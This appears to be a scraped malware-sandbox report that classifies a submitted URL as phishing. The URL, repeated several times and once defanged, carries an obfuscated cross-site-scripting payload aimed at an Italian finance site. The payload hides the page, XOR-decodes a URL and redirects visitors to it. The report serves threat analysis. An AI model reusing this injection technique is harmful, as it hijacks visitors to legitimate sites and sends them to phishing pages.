hxxps://avverafinanziamenti[.]it/?s=2%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other[.]everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow[.]par%60%2B%60ent[.]docu%60%2B%60ment[.]docu%60%2B%60mentEle%60%2B%60ment[.]st%60%2B%60yle[.]opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C31%2C78%2C100%2C95%2C71%2C126%2C24%2C31%2C18%2C111%2C26%2C80%2C94%2C80%2C115%2C96%2C109%2C69%2C29%2C89%2C115%2C126%2C98%2C71%2C83%2C27%2C121%2C68%2C99%2C98%2C69%2C98%2C126%2C88%2C117%2C70%2C83%2C95%2C107%2C24%2C104%2C112%2C68%2C66%2C108%2C30%2C19%2C68%2C92%2C90%2C104%2C94%2C126%2C122%2C89%2C79%2C67%2C102%2C76%2C70%2C88%2C91%2C101%2C111%2C107%2C84%2C84%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow[.]par%60%2B%60ent[.]loca%60%2B%60tion[.]hr%60%2B%60ef%3Durl[.]map%28value%3D%60%2BString[.]fromCharCode%2862%29%2B%60String[.]fromCharCode%28value%5E63%29%29[.]jo%60%2B%60in%28%27%27%29[.]concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw[.]toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString[.]replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep[.]over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max[.]do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E%23T%5ESC%259DU%2ACJ%C3%B7DBKC%23vMW%3Cimg%20src%3D%22Kg%5CO%27%28lL7%3D1QKz%3B%40J%26%21O~osvv%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22%2F~%2B%2B%C3%B7%27s%24m1%22%3E%3B%3EqZwH~%299hyorr%C3%97%28gK%3FcKY%2Bjm%2B~R%2FCST%21ci%3D%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other[.]everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow[.]par%60%2B%60ent[.]docu%60%2B%60ment[.]docu%60%2B%60mentEle%60%2B%60ment[.]st%60%2B%60yle[.]opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C31%2C78%2C100%2C95%2C71%2C126%2C24%2C31%2C18%2C111%2C26%2C80%2C94%2C80%2C115%2C96%2C109%2C69%2C29%2C89%2C115%2C126%2C98%2C71%2C83%2C27%2C121%2C68%2C99%2C98%2C69%2C98%2C126%2C88%2C117%2C70%2C83%2C95%2C107%2C24%2C104%2C112%2C68%2C66%2C108%2C30%2C19%2C68%2C92%2C90%2C104%2C94%2C126%2C122%2C89%2C79%2C67%2C102%2C76%2C70%2C88%2C91%2C101%2C111%2C107%2C84%2C84%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow[.]par%60%2B%60ent[.]loca%60%2B%60tion[.]hr%60%2B%60ef%3Durl[.]map%28value%3D%60%2BString[.]fromCharCode%2862%29%2B%60String[.]fromCharCode%28value%5E42%29%29[.]jo%60%2B%60in%28%27%27%29[.]concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw[.]toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString[.]replac

Sharing

Behavioral task

behavioral1

Sample

https://avverafinanziamenti.it/?s=2%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C31%2C78%2C100%2C95%2C71%2C126%2C24%2C31%2C18%2C111%2C26%2C80%2C94%2C80%2C115%2C96%2C109%2C69%2C29%2C89%2C115%2C126%2C98%2C71%2C83%2C27%2C121%2C68%2C99%2C98%2C69%2C98%2C126%2C88%2C117%2C70%2C83%2C95%2C107%2C24%2C104%2C112%2C68%2C66%2C108%2C30%2C19%2C68%2C92%2C90%2C104%2C94%2C126%2C122%2C89%2C79%2C67%2C102%2C76%2C70%2C88%2C91%2C101%2C111%2C107%2C84%2C84%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E%23T%5ESC%259DU%2ACJ%C3%B7DBKC%23vMW%3Cimg%20src%3D%22Kg%5CO%27%28lL7%3D1QKz%3B%40J%26%21O~osvv%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22%2F~%2B%2B%C3%B7%27s%24m1%22%3E%3B%3EqZwH~%299hyorr%C3%97%28gK%3FcKY%2Bjm%2B~R%2FCST%21ci%3D%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C31%2C78%2C100%2C95%2C71%2C126%2C24%2C31%2C18%2C111%2C26%2C80%2C94%2C80%2C115%2C96%2C109%2C69%2C29%2C89%2C115%2C126%2C98%2C71%2C83%2C27%2C121%2C68%2C99%2C98%2C69%2C98%2C126%2C88%2C117%2C70%2C83%2C95%2C107%2C24%2C104%2C112%2C68%2C66%2C108%2C30%2C19%2C68%2C92%2C90%2C104%2C94%2C126%2C122%2C89%2C79%2C67%2C102%2C76%2C70%2C88%2C91%2C101%2C111%2C107%2C84%2C84%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replac

Resource

win10v2004-20240426-en

windows10-2004-x64

6 signatures

150 seconds

General

Target

https://avverafinanziamenti.it/?s=2%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C31%2C78%2C100%2C95%2C71%2C126%2C24%2C31%2C18%2C111%2C26%2C80%2C94%2C80%2C115%2C96%2C109%2C69%2C29%2C89%2C115%2C126%2C98%2C71%2C83%2C27%2C121%2C68%2C99%2C98%2C69%2C98%2C126%2C88%2C117%2C70%2C83%2C95%2C107%2C24%2C104%2C112%2C68%2C66%2C108%2C30%2C19%2C68%2C92%2C90%2C104%2C94%2C126%2C122%2C89%2C79%2C67%2C102%2C76%2C70%2C88%2C91%2C101%2C111%2C107%2C84%2C84%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E%23T%5ESC%259DU%2ACJ%C3%B7DBKC%23vMW%3Cimg%20src%3D%22Kg%5CO%27%28lL7%3D1QKz%3B%40J%26%21O~osvv%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22%2F~%2B%2B%C3%B7%27s%24m1%22%3E%3B%3EqZwH~%299hyorr%C3%97%28gK%3FcKY%2Bjm%2B~R%2FCST%21ci%3D%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C31%2C78%2C100%2C95%2C71%2C126%2C24%2C31%2C18%2C111%2C26%2C80%2C94%2C80%2C115%2C96%2C109%2C69%2C29%2C89%2C115%2C126%2C98%2C71%2C83%2C27%2C121%2C68%2C99%2C98%2C69%2C98%2C126%2C88%2C117%2C70%2C83%2C95%2C107%2C24%2C104%2C112%2C68%2C66%2C108%2C30%2C19%2C68%2C92%2C90%2C104%2C94%2C126%2C122%2C89%2C79%2C67%2C102%2C76%2C70%2C88%2C91%2C101%2C111%2C107%2C84%2C84%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replac

Score

8^/10

phishing

Malware Config

Signatures

A potential corporate email address has been identified in the URL: 2iframesrcjavascriptfd7Other.everywhere1foriginalstylecodeStringwindow.parent.document.documentElement.style.opacity0url66949490891655939393493669479689270907947369715757312673702465126711221219667117102781177166901023178100957112624311811126809480115961096929891151269871832712168999869981268811770839510724104112686610830196892901049412612289796710276708891101111107848452728527fwef7elwefwef3000zwefwef3000zbwindow.parent.location.hrefurl.mapvalueString.fromCharCode62String.fromCharCodevalue63.join.concatchwchw.toUpUpDowncodeStringcodeString.replaceAllsalooaazefcrexecuteCodeFunctioncodeStringthatovrirsleep.overexecuteCodemax.doiframeymenutargetblankTSC9DUCJDBKCvMWimgsrcKgOlL71QKz@JOosvvaltimagehostbrahrefsm1qZwH9hyorrgKcKYjmRCSTciiframesrcjavascriptfd7Other.everywhere1foriginalstylecodeStringwindow.parent.document.documentElement.style.opacity0url66949490891655939393493669479689270907947369715757312673702465126711221219667117102781177166901023178100957112624311811126809480115961096929891151269871832712168999869981268811770839510724104112686610830196892901049412612289796710276708891101111107848452728527fwef7elwefwef3000zwefwef3000zbwindow.parent.location.hrefurl.mapvalueString.fromCharCode62String.fromCharCodevalue42.join.concatchwchw.toUpUpDowncodeStringcodeString.replac
phishing

Sharing

General

Malware Config

Signatures

Files